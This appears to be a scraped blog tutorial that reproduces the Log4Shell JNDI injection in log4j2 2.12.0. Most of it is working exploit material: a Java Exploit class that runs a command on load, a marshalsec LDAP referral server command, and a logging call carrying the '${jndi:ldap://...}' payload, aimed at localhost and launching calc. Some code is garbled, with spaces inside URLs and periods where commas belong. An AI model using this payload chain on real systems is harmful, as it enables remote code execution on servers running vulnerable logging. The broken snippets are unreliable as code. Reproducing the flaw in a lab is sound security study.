compile
public class Exploit
{
static
{
try
{
String[] cmd = { "calc" };
Runtime.getRuntime().exec(cmd).waitFor();
} catch(Exception e) { e.printStackTrace(); }}}Copy the codeFind an HTTP server and put exploits.class in the root directory to create a JNDI/RMI service using marshalsec
java -cp marshalsec-0.03.-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http:/ / 127.0.0.1: # 12345 / exploits
Copy the codeCreate a new project to introduce the problem log4j2 package
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.12.0</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.12.0</version>
</dependency>
Copy the codeCreate the following code (remember to load the log4j2 configuration)
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Main {
private static final Logger logger = LogManager.getLogger();
public static void main(String[] args) {
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase"."true");
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase"."true");
logger.error("${jndi: ldap: / / 127.0.0.1:1389 / exploits}"); }}Copy the codeReference article:
-
Bbs.ichunqiu.com/thread-6232…
-
Nosec.org/home/detail…
-
Blog.csdn.net/whatday/art…
-
Kingx. Me/Restriction…
-
Github.com/kxcode/JNDI…